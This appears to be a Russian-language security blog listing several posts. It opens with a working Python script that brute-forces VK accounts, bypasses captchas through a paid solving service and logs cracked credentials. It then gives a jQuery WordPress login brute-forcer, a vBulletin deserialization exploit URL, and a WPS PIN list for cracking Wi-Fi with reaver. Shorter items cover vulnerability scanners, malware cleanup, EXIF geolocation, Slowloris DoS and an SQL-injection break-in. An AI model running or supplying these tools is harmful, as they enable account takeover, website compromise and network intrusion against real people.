Скрипт для простого перебора вк через мобильную версию

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#! coding: utf8
import grab,re,urllib2
from antigate import AntiGate
from grab import GrabTimeoutError
from time import sleep
import sys,os

cap_key = '' #Ваш ключ с антигейт

def anti(key, file): #Получение решения капчи с антигейт
    try:
        try:
            data = AntiGate(key, file)
            return data
        except KeyboardInterrupt:
            print "Завершение"
    except:
        anti(key,file)
def save(url, file): #Скачивание файла по урл
    f = urllib2.urlopen(url)
    f2 = open(file, 'wb')
    f2.write(f.read())

def cap_solve(img):
    save(img, 'captcha.jpg')
    key = anti(cap_key, 'captcha.jpg')
    return key

def brute(login,passwords,save):
    o = open(save,'a')
    o2 = open(passwords,'r')

    try:
        int(login)
        prefix = True
    except:
        prefix = False
    g = grab.Grab()
    g.go('http://m.vk.com')

    for i in o2:

        i2 = i.rstrip('\r\n')
        g.doc.set_input('email',login)
        g.doc.set_input('pass',i2)
        g.doc.submit()

        if g.doc.text_search(u'captcha'):
            c1 = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
            c2 = 'http://m.vk.com' + c1
            key = cap_solve(c2)
            g.doc.set_input('email',login)
            g.doc.set_input('pass',i2)
            g.doc.set_input('captcha_key',str(key))
            g.doc.submit()
            print "cap"

        if 'Подтвердить' in g.response.body:
            if prefix:
                prefix1 = g.doc.rex_search('<span class="field_prefix">\+[0-9]*</span>').group(0)
                prefix2 = g.doc.rex_search('<span class="field_prefix">&nbsp;[0-9]*</span>').group(0)
                pre1 = re.findall('[0-9]{1,}', prefix1)[0]
                pre2 = re.findall('[0-9]{1,}', prefix2)[0]

                login = login.replace(pre1,'')
                login = login.replace(pre2,'')

                g.set_input('code', login)
                g.submit()
                print login + ':' + i2 + '--success'
                o.write(login + ':' + i2 + '\n')
            else:
                o.write(login + ':' + i2 + '\n')
        else:
            if g.doc.rex_search('<title>[^>]+</title>').group(0) == '<title>Login | VK</title>':
                print login + ':' + i2 + '--fail'
            else:
                print login + ':' + i2 + '--success'
                o.write(login + ':' + i2 + '\n')
    o.close()
    o2.close()

def main():
    try:
        argv1 = sys.argv[1]
        argv2 = sys.argv[2]
        brute(argv1,argv2,"log.txt")
    except IndexError:
        print "Неправильные параметры"

    except IOError:
        print "Нет такого файла"


if __name__ == "__main__":
    main()

WordPress Login form brute force in jQuery

1) Add jQuery:

1
2
3
4
var script = document.createElement('script');
script.src = 'https://yastatic.net/jquery/2.1.3/jquery.min.js';
script.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(script);

2) Create textarea field and paste your passwords list:

1
$('body').prepend('<textarea id="pwds"></textarea>')

3) other part of code just paste and run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
var passwords = $('#pwds').val().split(/\r?\n/);

$('#loginform').submit(function(){
    var data = $(this).serialize();
    var pwd = $('#user_pass').val();
    $.post('/wp-login.php', data, function(datas){
        if(!datas.match(/Incorrect password/)){
            console.log('Correct password: '+pwd);
        }
    })
    return false;
});

$.each(passwords, function(k, v){
    $('#user_pass').val(v);
    $('#loginform').submit();
});

Enjoy and be ready to be banned by hoster 😉

Эксплоит под vBulletin [decodeArguments]

В паблик запостили сплойт под vBulletin последних версий. Ниже код пруфа, который выводит phpinfo.
PoC:

1
http://localhost/vbforum/ajax/api[/]hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

via: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html

База WPS pin-кодов

Ниже представлена база WPS pin-кодов, в зависимости от MAC-адреса точки доступа. Это всего лишь возможные значения, которые находились эмпирическим путем и были выдернуты мной из программы WPScrackGUI v1.1.8

 

Кто не знает, эти pin-коды нужно использовать с программой reaver [http://code.google.com/p/reaver-wps/], читаем по ссылке как ее готовят и с чем едят.

UPD1 19.11.2013:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
00:14:D1 26848185 1234XXXX
00:18:E7 15537782
00:19:15 12345670 63396638
00:19:70 4286XXXX 6496XXXX
00:21:29 64637129 22310298 64103747 95891705
00:24:17 31011193
00:26:44 7820XXXX 78202962 49780871
00:38:72 1562XXXX 18836486
00:48:7A 15471628
00:0C:F1 30447028
00:1A:2B 15624697 8847XXXX
00:1D:19
00:1D:7E 66026402
00:1D:73 88420707
00:4F:62 21207136
7C:4F:B5 75332662 72688656
A0:21:87 92442559
A0:21:B7 63825XXX 0634XXXX 01318104 6557XXXX 0669XXXX 5400XXXX 1441XXXX
5C:33:8E 82848439 11765592 43154XXX 1111XXXX 9901XXXX
84:A8:E4 7996XX00
30:46:9A 9754XXXX 95221XXX 3444XXXX 344449XX 1504XXXX 19482417 95221021 2170XXXX
30:39:F2 1670XXXX 16538061 4329XXXX 1340XXXX 1835XXXX 8820XXXX
50:67:F0 20064525 26599625 146076XX 1452XXXX 18674095 91726681 44947477 05884889 8253600 52594809 51660567 95048147 19634173 72344071 03419724 11288879 67971862 23380622 42768777 04898702 09165847
F4:3E:61
58:6D:8F 47158382 69382161
94:44:52 93645348 2444XXXX 5319XXXX 26023809
08:86:3B 21250491
40:4A:03 11866428 79205177
64:68:0C 7996XXXX
88:25:2C 7654XXXX 03526859 7442XXXX 74425648 3565XXXX 0452XXXX
04:C0:6F 0751XXXX
20:4E:7F 45197079
20:2B:C1 1957XXXX
F8:D1:11 4867XXXX
F4:C7:14
C4:3D:C7 5141XXXX 51419981 6810XXXX
B0:48:7A 0055XXXX 54335677 8667XXXX
1C:7E:E5 6041XXXX 22609298 60418579
38:60:77
CC:96:77
C0:C1:C0 78985933 7898XXXX
C0:AC:54
C0:3F:0E 8345XXXX 2585XXXX 2503XXXX
34:08:04 36022656 93395274
74:44:01 3555XXXX 00446747 2761XXXX 27615126 4522XXXX 4545XXXX
BC:76:70 6326XXXX 6343XXXX 63431919 6431XXXX
00:1D:CE 85560130
58:98:35 53890894
DC:0B:1A 1653XXXX 18355604 88202907 13409708 43297917 21158766
38:72:C0 12345678 2017XXXX
72:C0:6F 3863XXXX
6A:C7:14 3205XXXX 3227XXXX 3365XXXX 3495XXXX CO:3F:0E 8321XXXX 25032918
72:A8:E4 3357XXXX
62:C0:6F 3663XXXX 3442XXXX 3304XXXX
00:0B:3B 3814XXXX
00:24:01 97744757
E0:CB:4E 62987523
00:26:CE
00:11:6B 3042XXXX
5C:35:3B 64874487 6487XXXX 9575XXXX
00:26:24 95374611
68:C0:6F 41719565
00:26:5A 76971464
1A:0B:40 17068161
6A:C0:6F 3722XXXX 3539XXXX
6A:A8:E4 3416XXXX 5198XXXX
54:E6:FC 5325XXXX 53256XXX 9999XXXX
E0:69:95
00:22:F7 2456XXXX
CC:96:A0 5051XXXX 5090XXXX 1623XXXX
00:18:02 16546615
2C:B0:5D 5482XXXX 5535XXXX
08:10:74 20956455
00:22:3F 48247818
C8:3A:35 11195207
00:1F:1F 85521162 85521261 85544482
D8:5D:4C 7452XXXX
D0:AE:EC 2417XXXX 0934XXXX 5089XXXX
80:B6:86 4049XXXX 3632XXXX
90:F6:52 15094148 61296879 26412948
22:4E:7F 1558XXXX
94:0C:6D 3795XXXX
74:EA:3A 8388XXXX
1C:AF:F7 0630XXXX DC:OB:1A
00:A0:26 8224XXXX
00:1F:A4
C8:60:00 46264848
F8:3D:FF 25905892
A0:0B:BA 00000000
72:3D:FF 50540686
50:7E:5D 8840XXXX 8846XXXX
E4:7C:F9
00:12:FB
72:C7:14 33614XXX
C0:EF:0E 11034XXX 29159XXX
59:98:35 34739XXX
00:0A:52
5C:33:E8
94:FE:F4 43944552
53:33:8E 9924XXXX
62:55:9C 0111XXXX
6A:55:9C 9957XXXX
00:1D:1A 2053XXXX
38:72:0C
1C:C6:3C 1860XXXX
72:E8:7B 1478XXXX
74:31:70 7776XXXX
10:C6:1F 22643223
98:FC:11 55132909 93532655
00:23:08
14:D6:4D 20700737 64535203
54:6E:FC 02917092
C8:D5:FE
00:22:6B 59900887
AC:E8:7B 77502896
00:4F:67 13648947
19:15:C1
E0:91:15 42764199
00:05:59 2519XXXX
08:76:FF 79412988
00:11:22 6541XXXX
14:D6:D4 31008167
14:E6:E4 8118XXXX
00:1D:D1 37272937
00:B0:0C 1924XXXX
E8:40:F2 4676XXXX
8C:CA:32 71259987
00:30:4F 8764XXXX
00:26:5B 28390046
00:1D:CD 9839XXXX
F4:6D:21 8XXXXXXX
5C:4C:A9 1234567X
1C:BD:B9 55349758 70313376
4C:17:EB
00:19:18
00:25:9C 78091597
4C:60:DE 42473534 22958143 53550866
6A:1D:67 04161608
00:1D:D2 49143836 58542132 14550126
B4:74:9F 23659391
E0:91:F5 49945386
62:C7:14 32184129
84:1B:5E 78100053 1354XXXX
00:23:69 51348014
80:1F:02
00:24:A5 44960452
00:23:CD 54080812
50:46:5D 21101021 46540010
B8:A3:86 19217581
B8:9B:C9 41613849
54:04:A6 31028325 3211XXXX

Новый релиз сканера уязвимостей RIPS 0.4

Год назад делал уже заметку насчет этого сканера узких мест в PHP приложениях.
Опишу только основные «вкусности» которые появились в новой версии.
Первое на что обратил внимание — это появление графического представления взаимосвязей сканируемых файлов (инклуды, функции).

Также скрипт пытается анализироваться самостоятельно возможные места с SQL-инъекциями (правда пока эта функция в стадии глубокой альфы).
Появился вывод статистики после сканирования.

Rips все еще буксует на крупных проектах которые в основной массе построены на ООП, обещают пофиксить в следующих версиях.
Скачать актуальную версию сканера RIPS. Continue reading «Новый релиз сканера уязвимостей RIPS 0.4»

Чистим javascript файлы от вирусов (заметка)

В основном заражают javascript файлы, как правило код пропущен через обфускатор (base64, japan utf-8 etc).
Очень легко в таких заражениях найти уникальную сигнатуру, и почистить все одним махом.
И так:

1
grep -rl 'hVu6r#r#iFy#eVtV' ./ | xargs sed -i '/hVu6r#r#iFy#eVtV/d'

hVu6r#r#iFy#eVtV — это и есть наша уникальная сигнатура.

Получаем местонахождение через GPS-инфо в изображении

gps_exif
gps_exif

Многие мобильные телефоны оснащенные GPS навигаторами вставляют информацию о местонахождении в фотографию(т.е. в EXIF).
На написание этого скрипта подвигло выступление одного хакера создавшего сайт мониторинга местоположения через сервис Twitter’a.
В общем для работы скрипта необходимо установить модуль Image::EXIF (sudo cpan -i Image::EXIF), возможно, также придется установить и другой пакет, если первый не будет собираться (sudo cpan -i YAML возможно еще и sudo apt-get install libexif-dev), на выходе получаем собственно сами координаты и название места, где было сделано фото. Continue reading «Получаем местонахождение через GPS-инфо в изображении»

RIPS — сканер уязвимостей в PHP приложениях

RIPS-сканер уязвимостей

Сканер предназначен для отслеживания «узких» мест, статичного кода PHP, которые могут быть потенциально опасны,
и использованы для взлома приложения.
RIPS — аббревиатура от pRocess of Identifying Potential Security, что в вольном переводе означает «процесс выявления потенциальной бреши».

Основные возможности сканера RIPS:
— обнаружения XSS, SQL-инъекций, локального и удаленного инклюдинга файлов
— 5 уровней вывода отладочной информации при сканировании
— подсветка уязвимого участка кода
— создание эксплоитов в пару кликов (на основе CURL)
— семь различных цветовых тем для подсветки синтаксиса

Скачать сканер можно здесь -> http://sourceforge.net/projects/rips-scanner/

UPD: описание некоторых обновление в новой версии сканера уязвимостей в php приложениях

Slowloris HTTP DoS

slowloris
slowloris

Эксперт в области информационной безопасности Роберт Хансен (Robert Hansen), известный под ником RSnake, сконструировал инновационный инструмент, пригодный для проведения атак типа «Denial of Service» нового поколения. Творение Хансена, получившее имя Slowloris, использует обнаруженную уязвимость в архитектуре серверов Apache и других популярных веб-серверов.

В отличие от DoS-атак «старой школы», которые позволяли подвесить любой веб-сайт путем бомбардировки сервера пакетами данных и возникающих как следствие перегрузки каналов связи, Slowloris позволяет добиться тех же результатов путем отправки относительно небольшого количества пакетов. Continue reading «Slowloris HTTP DoS»

Как был получен доступ к БД Transcend

Увидев на форуме пост одного товарища, о том как он решил поискать баги на сайтах
IRiver, потому что у него есть плеер этой фирмы, я решил и себе посмотреть, думаю
вы поняли какой фирмы у меня MP3 плеер.

Долго искать не пришлось, все как в бесчисленных мануалах, об SQL-injection,
вывалилась ошибка сообщившая, что БД крутиться на MSSQL, сайт написан на .ASP.
Версия:

Microsoft SQL Server 2000 — 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Continue reading «Как был получен доступ к БД Transcend»

Ubuntu CUPS vulnerabilities

Сегодня вышло очередное обновление безопасности для версий:
Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS, обновление касается также и
Kubuntu, Edubuntu, и Xubuntu.
Проблема устраняется обновлением следующих пакетов до версий:

Ubuntu 6.06 LTS: cupsys 1.2.2-0ubuntu0.6.06.11;Ubuntu 7.04: cupsys 1.2.8-0ubuntu8.6; Ubuntu 7.10: cupsys 1.3.2-1ubuntu7.8; Ubuntu 8.04 LTS: cupsys 1.3.7-1ubuntu3.1.